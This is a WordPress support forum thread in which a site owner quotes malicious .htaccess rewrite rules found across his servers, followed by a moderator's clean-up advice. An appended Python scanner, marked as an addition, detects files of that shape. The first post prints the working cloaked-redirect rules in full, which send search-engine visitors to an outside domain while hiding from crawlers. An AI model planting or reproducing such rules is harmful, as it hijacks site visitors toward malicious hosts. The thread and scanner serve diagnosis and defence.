Title: .htaccess Attack!
Last modified: August 19, 2016

---

# .htaccess Attack!

 *  [welshhuw](https://wordpress.org/support/users/welshhuw/)
 * (@welshhuw)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/htaccess-attack/)
 * Hi,
 * I have been finding some .htaccess files containing the following within my WordPress
   installation. Also, we have another 20ish sites on the same server, and the files
   have appeared there too. (These sites are html/css sites run on our custom CMS)
 * ```
   RewriteEngine On
   RewriteCond %{REQUEST_METHOD} ^GET$
   RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
   RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
   RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
   RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
   RewriteCond %{HTTPS} ^off$
   RewriteRule ^(.*)$ http://protechere.com/cgi-bin/r.cgi?p=10003&i=aab066bc&j=310&m=708aa72730768a8e4702c023017cccd9&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
   # exgocgkctswo
   ```
 * I have been deleting the infected files but can someone help me shed some light
   on what it is and how it got there! My server guys are saying it's something to
   do with a WP plugin?
 * Thanks

Viewing 6 replies - 1 through 6 (of 6 total)

 *  Moderator [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/)
 * (@ipstenu)
 * 🏳️‍🌈 Advisor and Activist
 * [15 years, 7 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749193)
 * Well … what plugins are you running?
 * It looks more like a server hack to me, but it could be a bad plugin, so start
   by disabling and deleting the ones you don’t need AND changing your server and
   WordPress passwords. Just in case.
 *  Thread Starter [welshhuw](https://wordpress.org/support/users/welshhuw/)
 * (@welshhuw)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749202)
 * Hi,
 * Thanks for your reply. Here is the list of plugins I have running. Over about
   5 WP installations.
 * Akismet, All In One Seo Pack, Google XML Sitemaps, wp Smush.it, Automatic SEO links,
   cForms, Featured Content Gallery, Super Image Plugin, Video Widget, WP Security Scan,
   FeedWordpress, TDO Mini Forms
 * I have deleted and disabled the ones I wasn’t using and didn’t need.
 * Any advice on where this could’ve come from would be gratefully received!!
 * Thanks again.
 *  Moderator [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/)
 * (@ipstenu)
 * 🏳️‍🌈 Advisor and Activist
 * [15 years, 7 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749210)
 * None of those should be causing this behavior.
 * Read this: [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 * Your server may be under attack.
 *  Thread Starter [welshhuw](https://wordpress.org/support/users/welshhuw/)
 * (@welshhuw)
 * [15 years, 6 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749381)
 * Thanks but the server guys are abs. positive it’s due to plugins…!?
 * Have deleted all infected files and checked all plugins are up to date.
 *  Moderator [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/)
 * (@ipstenu)
 * 🏳️‍🌈 Advisor and Activist
 * [15 years, 6 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749385)
 * Yeah, a lot of the times server guys are 100% sure it’s plugins. Generally it’s
   not. I mean, yes, SOME plugins are made by hackers, but it’s more common that
   a botched plugin install leaves your server insecure, which opens you to server
   hacks. And even more common than THAT is a server insecure on a level you, as
   a user, cannot fix, and your host must.
 * Change your server password, your database password, and your blog passwords.
 * Check the folder/file permissions on your account. Do the best you can.
 *  Thread Starter [welshhuw](https://wordpress.org/support/users/welshhuw/)
 * (@welshhuw)
 * [15 years, 6 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749421)
 * Did all of the above and now it’s back!!
 * But what I can figure out is that the infected files have a later date than when
   I cleaned them all out???
 * I know I would have deleted/cleaned them out so is it possible for them to ‘back-date’
   the infected files?
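
The rule set quoted in the first post redirects only requests whose referer is a search engine, skips a long list of crawler and tool user agents, and sets a cookie so each visitor is redirected once, which is why it is easy to miss when browsing the site directly. As an added example (not part of the thread or of WordPress), this Python scanner finds `.htaccess` files of that shape under a web root and returns them with their modification times; the sample rules, the host `redirector.example` and the cookie name are constructed.

```python
import os
import re
from urllib.parse import urlsplit

# Constructed sample in the shape of the posted rules (placeholder host and cookie).
SAMPLE_INFECTED = r'''RewriteEngine On
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bot|Crawl|curl|wget).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*samplecookie.*$
RewriteRule ^(.*)$ http://redirector.example/r.cgi?h=%{HTTP_HOST} [R=302,L,CO=samplecookie:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
'''

# RewriteCond: TestString CondPattern [flags]; RewriteRule: Pattern Substitution [flags]
DIRECTIVE = re.compile(
    r'^\s*(RewriteCond|RewriteRule)\s+(\S+)\s+(\S+)(?:\s+\[(.*)\])?', re.I)

def analyse(text):
    """Flag RewriteRules that send referer-selected visitors to another host."""
    findings, cond_vars = [], set()
    for lineno, line in enumerate(text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if not m:
            continue
        kind, first, second, flags = m.groups()
        if kind.lower() == 'rewritecond':
            cond_vars.update(re.findall(r'%\{(\w+)\}', first.upper()))
            continue
        if re.match(r'https?://', second, re.I) and 'HTTP_REFERER' in cond_vars:
            findings.append({
                'line': lineno, 'target_host': urlsplit(second).hostname,
                'skips_user_agents': 'HTTP_USER_AGENT' in cond_vars,
                'sets_cookie': bool(re.search(r'(^|,)\s*(CO|cookie)=', flags or '', re.I))})
        cond_vars = set()  # conditions apply only to the RewriteRule that follows them
    return findings

def scan(root):
    """Return (path, mtime, findings) for each suspicious .htaccess, oldest first."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        if '.htaccess' in files:
            path = os.path.join(dirpath, '.htaccess')
            with open(path, encoding='utf-8', errors='replace') as fh:
                found = analyse(fh.read())
            if found:
                hits.append((path, os.path.getmtime(path), found))
    return sorted(hits, key=lambda h: h[1])

if __name__ == '__main__':
    print(analyse(SAMPLE_INFECTED))
```

Running `scan()` over the parent directory of all sites on a shared server and comparing the returned modification times with the clean-up time shows which files were rewritten afterwards.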


The topic ‘.htaccess Attack!’ is closed to new replies.

## Tags

 * [attack](https://wordpress.org/support/topic-tag/attack/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 6 replies
 * 2 participants
 * Last reply from: [welshhuw](https://wordpress.org/support/users/welshhuw/)
 * Last activity: [15 years, 6 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749421)
 * Status: not resolved

